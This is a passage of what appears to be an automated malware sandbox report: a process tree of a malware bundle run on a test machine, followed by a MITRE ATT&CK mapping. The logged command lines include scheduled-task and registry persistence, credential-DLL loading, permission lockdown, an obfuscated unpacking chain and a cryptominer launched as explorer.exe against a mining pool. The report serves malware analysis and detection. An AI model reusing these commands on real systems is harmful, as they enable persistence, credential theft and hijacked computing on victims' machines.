"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
18⤵
PID:3104

C:\Users\Admin\AppData\Local\Temp\logger2.exe
"C:\Users\Admin\AppData\Local\Temp\logger2.exe"
13⤵
PID:5712

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5712 -s 2236
14⤵
- Program crash
PID:5348

C:\Users\Admin\AppData\Local\Temp\logger2.exe
"C:\Users\Admin\AppData\Local\Temp\logger2.exe"
11⤵
PID:5356

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
12⤵
PID:5664

C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
13⤵
PID:4912

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
14⤵
PID:5188

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
15⤵
PID:2784

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
16⤵
- Creates scheduled task(s)
PID:4028

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
15⤵
PID:4952

C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
16⤵
PID:4664

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
17⤵
PID:5604

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
18⤵
PID:3488

C:\Users\Admin\AppData\Local\Temp\logger2.exe
"C:\Users\Admin\AppData\Local\Temp\logger2.exe"
13⤵
PID:4824

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4824 -s 2232
14⤵
- Program crash
PID:1356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\izjrteja.ka0\handselfdiy_0.exe & exit
9⤵
PID:5356

C:\Users\Admin\AppData\Local\Temp\izjrteja.ka0\handselfdiy_0.exe
C:\Users\Admin\AppData\Local\Temp\izjrteja.ka0\handselfdiy_0.exe
10⤵
PID:5720

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
11⤵
PID:6120

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
12⤵
- Kills process with taskkill
PID:5940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
11⤵
PID:5992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc2d084f50,0x7ffc2d084f60,0x7ffc2d084f70
12⤵
PID:5232

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aa5glmu5.xfc\wDzAUYj.exe & exit
9⤵
PID:5512

C:\Users\Admin\AppData\Local\Temp\aa5glmu5.xfc\wDzAUYj.exe
C:\Users\Admin\AppData\Local\Temp\aa5glmu5.xfc\wDzAUYj.exe
10⤵
PID:5632

C:\Windows\SysWOW64\cmd.exe
cmd /c UJjhkasjkhdhIUOEWUeruieuirhquiwehjkHAJKShdkjewqwe
11⤵
PID:5944

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Cui.m4a & ping -n 5 localhost
11⤵
PID:6136

C:\Windows\SysWOW64\cmd.exe
cmd
12⤵
PID:5480

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
13⤵
- Enumerates processes with tasklist
PID:5840

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
13⤵
PID:4980

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^cJeAaTAWNJZTECnEJELGyElCkLFXCacxFVGTAGQgcNDeNqmVhIzzmooQnAgHgDzxhEgIVFtrOblawoOkkKJTYeUbNQcZsoZSzoP$" Aprile.m4a
13⤵
PID:3420

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Talvolta.exe.pif
Talvolta.exe.pif E
13⤵
PID:924

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
12⤵
- Runs ping.exe
PID:5864

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2a2ximu3.evu\rmaa1045.exe & exit
9⤵
PID:5844

C:\Users\Admin\AppData\Local\Temp\2a2ximu3.evu\rmaa1045.exe
C:\Users\Admin\AppData\Local\Temp\2a2ximu3.evu\rmaa1045.exe
10⤵
PID:64

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 64 -s 696
11⤵
- Program crash
PID:3296

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0rmwc4kl.h0u\installer.exe /qn CAMPAIGN=654 & exit
9⤵
PID:6040

C:\Users\Admin\AppData\Local\Temp\0rmwc4kl.h0u\installer.exe
C:\Users\Admin\AppData\Local\Temp\0rmwc4kl.h0u\installer.exe /qn CAMPAIGN=654
10⤵
PID:4304

C:\Users\Admin\AppData\Local\Temp\MJXLHOVFPZ\poweroff.exe
"C:\Users\Admin\AppData\Local\Temp\MJXLHOVFPZ\poweroff.exe" /VERYSILENT
8⤵
PID:1612

C:\Users\Admin\AppData\Local\Temp\is-FK8C4.tmp\poweroff.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FK8C4.tmp\poweroff.tmp" /SL5="$601FC,490199,350720,C:\Users\Admin\AppData\Local\Temp\MJXLHOVFPZ\poweroff.exe" /VERYSILENT
9⤵
PID:2948

C:\Program Files (x86)\powerOff\Power Off.exe
"C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu
10⤵
PID:2260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 629b424128480_ea39154.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:628

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b424128480_ea39154.exe
629b424128480_ea39154.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2368

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b424128480_ea39154.exe
629b424128480_ea39154.exe
6⤵
- Executes dropped EXE
PID:1796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 629b424262671_af550a21f.exe
4⤵
PID:1156

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b424262671_af550a21f.exe
629b424262671_af550a21f.exe
5⤵
- Executes dropped EXE
PID:1700

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1700 -s 888
6⤵
- Program crash
PID:2712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 629b423f41328_e47c3b.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3128

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b423f41328_e47c3b.exe
629b423f41328_e47c3b.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:1380

C:\Users\Admin\AppData\Roaming\422037.exe
"C:\Users\Admin\AppData\Roaming\422037.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
PID:1940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 629b42452ea65_084d112c.exe
4⤵
PID:1884

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b42452ea65_084d112c.exe
629b42452ea65_084d112c.exe
5⤵
- Executes dropped EXE
PID:4784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 629b424480f43_d579e65.exe
4⤵
PID:888

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b424480f43_d579e65.exe
629b424480f43_d579e65.exe
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2660

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:3424

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
6⤵
PID:736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0x9c,0x108,0x7ffc2d084f50,0x7ffc2d084f60,0x7ffc2d084f70
7⤵
PID:4824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,9434523781725354239,3526371701846848428,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1680 /prefetch:2
7⤵
PID:672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,9434523781725354239,3526371701846848428,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2000 /prefetch:8
7⤵
PID:1176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,9434523781725354239,3526371701846848428,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2332 /prefetch:8
7⤵
PID:5964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,9434523781725354239,3526371701846848428,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2924 /prefetch:1
7⤵
PID:5612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,9434523781725354239,3526371701846848428,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1
7⤵
PID:5716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 629b424833bdc_2e9304e7.exe /mixtwo
4⤵
PID:3296

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b424833bdc_2e9304e7.exe
629b424833bdc_2e9304e7.exe /mixtwo
5⤵
- Executes dropped EXE
PID:816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 464
6⤵
- Program crash
PID:612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 776
6⤵
- Program crash
PID:756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 784
6⤵
- Program crash
PID:2144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 784
6⤵
- Program crash
PID:1732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 808
6⤵
- Program crash
PID:4180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 848
6⤵
- Program crash
PID:2952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 1036
6⤵
- Program crash
PID:3144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 1356
6⤵
- Program crash
PID:400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "629b424833bdc_2e9304e7.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b424833bdc_2e9304e7.exe" & exit
6⤵
PID:5108

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "629b424833bdc_2e9304e7.exe" /f
7⤵
- Kills process with taskkill
PID:2160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 1316
6⤵
- Program crash
PID:116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 629b4246ab171_537a2a42d.exe
4⤵
PID:1308

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b4246ab171_537a2a42d.exe
629b4246ab171_537a2a42d.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:5104

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4486665847.exe"
6⤵
PID:1544

C:\Users\Admin\AppData\Local\Temp\4486665847.exe
"C:\Users\Admin\AppData\Local\Temp\4486665847.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:1008

C:\Users\Admin\AppData\Local\Temp\2fd8a2d199\orxds.exe
"C:\Users\Admin\AppData\Local\Temp\2fd8a2d199\orxds.exe"
8⤵
- Executes dropped EXE
- Checks computer location settings
PID:616

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2fd8a2d199\
9⤵
PID:1432

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2fd8a2d199\
10⤵
PID:1336

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN orxds.exe /TR "C:\Users\Admin\AppData\Local\Temp\2fd8a2d199\orxds.exe" /F
9⤵
- Creates scheduled task(s)
PID:2264

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\7b808607219092\cred.dll, Main
9⤵
PID:5348

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\7b808607219092\cred.dll, Main
9⤵
PID:5396

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\7b808607219092\cred.dll, Main
9⤵
PID:5504

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "629b4246ab171_537a2a42d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b4246ab171_537a2a42d.exe" & exit
6⤵
PID:1936

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "629b4246ab171_537a2a42d.exe" /f
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 1500
6⤵
- Program crash
PID:224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 629b4245da557_66e2cbf.exe
4⤵
PID:1776

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b4245da557_66e2cbf.exe
629b4245da557_66e2cbf.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4432

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b4245da557_66e2cbf.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b4245da557_66e2cbf.exe" help
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3692

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 1700 -ip 1700
1⤵
PID:2904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 816 -ip 816
1⤵
PID:1820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5104 -ip 5104
1⤵
PID:1500

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:1444

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
- Loads dropped DLL
PID:5072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 600
3⤵
- Program crash
PID:1472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5072 -ip 5072
1⤵
PID:1196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 816 -ip 816
1⤵
PID:3288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 816 -ip 816
1⤵
PID:3924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 816 -ip 816
1⤵
PID:3052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 816 -ip 816
1⤵
PID:3632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 816 -ip 816
1⤵
PID:1280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 816 -ip 816
1⤵
PID:1444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 816 -ip 816
1⤵
PID:3852

C:\Users\Admin\AppData\Local\Temp\2fd8a2d199\orxds.exe
C:\Users\Admin\AppData\Local\Temp\2fd8a2d199\orxds.exe
1⤵
PID:3128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 816 -ip 816
1⤵
PID:4224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4424 -ip 4424
1⤵
PID:2160

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3648

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5340

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 0F555623044E6224E9D7A96BF00CB795 C
2⤵
PID:5868

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 57089280691E48B8F7184B5B76BBD68B C
2⤵
PID:5116

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E4BE293A19866A774ED43E88E3FE8F3D
2⤵
PID:5028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4424 -ip 4424
1⤵
PID:5412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4332 -ip 4332
1⤵
PID:5424

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:5544

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:5620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 600
3⤵
- Program crash
PID:5868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5620 -ip 5620
1⤵
PID:5760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4424 -ip 4424
1⤵
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4332 -ip 4332
1⤵
PID:4376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4424 -ip 4424
1⤵
PID:5672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4332 -ip 4332
1⤵
PID:5564

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 636 -p 64 -ip 64
1⤵
PID:5892

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 184 -p 5300 -ip 5300
1⤵
PID:3108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4332 -ip 4332
1⤵
PID:5968

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:5708

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:5808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 600
3⤵
- Program crash
PID:5444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4424 -ip 4424
1⤵
PID:4884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5808 -ip 5808
1⤵
PID:6092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6128 -ip 6128
1⤵
PID:5364

C:\Users\Admin\AppData\Local\Temp\2fd8a2d199\orxds.exe
C:\Users\Admin\AppData\Local\Temp\2fd8a2d199\orxds.exe
1⤵
PID:5968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4332 -ip 4332
1⤵
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4424 -ip 4424
1⤵
PID:3380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4332 -ip 4332
1⤵
PID:5240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4424 -ip 4424
1⤵
PID:6084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4332 -ip 4332
1⤵
PID:4516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4424 -ip 4424
1⤵
PID:1072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4424 -ip 4424
1⤵
PID:5356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4332 -ip 4332
1⤵
PID:5172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4332 -ip 4332
1⤵
PID:6132

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 644 -p 5712 -ip 5712
1⤵
PID:5728

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 644 -p 5872 -ip 5872
1⤵
PID:5260

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 184 -p 4824 -ip 4824
1⤵
PID:5304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
1⤵
PID:3852

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5d96b534-022e-5a4a-8a7c-f621a4b2fd0b}\oemvista.inf" "9" "4d14a44ff" "0000000000000134" "WinSta0\Default" "0000000000000158" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:5356

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000134"
2⤵
PID:5244

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4304

C:\Users\Admin\AppData\Local\Temp\2fd8a2d199\orxds.exe
C:\Users\Admin\AppData\Local\Temp\2fd8a2d199\orxds.exe
1⤵
PID:5208

C:\Users\Admin\AppData\Local\Temp\DA49.exe
C:\Users\Admin\AppData\Local\Temp\DA49.exe
1⤵
PID:2368

C:\Users\Admin\AppData\Local\Temp\DA49.exe
C:\Users\Admin\AppData\Local\Temp\DA49.exe
2⤵
PID:4892

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\b29a8608-3a12-4e5c-8e7c-03a4e1c7baf5" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:5980

C:\Users\Admin\AppData\Local\Temp\DA49.exe
"C:\Users\Admin\AppData\Local\Temp\DA49.exe" --Admin IsNotAutoStart IsNotTask
3⤵
PID:3272

C:\Users\Admin\AppData\Local\Temp\DA49.exe
"C:\Users\Admin\AppData\Local\Temp\DA49.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:3584

C:\Windows\explorer.exe
explorer.exe -o pool.supportxmr.com:7777 -B -u 49xfoBcVngQRN3FvhfdCzjcZ58KUBMw9zStVT8GqKerN3TWDHSodDNB9XNHfNkQ9xFCmGat71vL9nTGa8JAdggGQDPu17mn.554A03F3
1⤵
PID:6004

C:\Users\Admin\AppData\Local\Temp\EB32.exe
C:\Users\Admin\AppData\Local\Temp\EB32.exe
1⤵
PID:5872

C:\Users\Admin\AppData\Local\Temp\449.exe
C:\Users\Admin\AppData\Local\Temp\449.exe
1⤵
PID:5580

C:\Users\Admin\AppData\Local\Temp\256E.exe
C:\Users\Admin\AppData\Local\Temp\256E.exe
1⤵
PID:3300

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:4156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 308
2⤵
- Program crash
PID:4024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3300 -ip 3300
1⤵
PID:5000

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 656 -p 628 -ip 628
1⤵
PID:5384

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 404 -p 1016 -ip 1016
1⤵
PID:1152

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1016 -s 3504
1⤵
- Program crash
PID:2500

C:\Users\Admin\AppData\Local\Temp\2fd8a2d199\orxds.exe
C:\Users\Admin\AppData\Local\Temp\2fd8a2d199\orxds.exe
1⤵
PID:5680

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\629b423cc2898_2a68ceba.exe.log
Filesize
621B

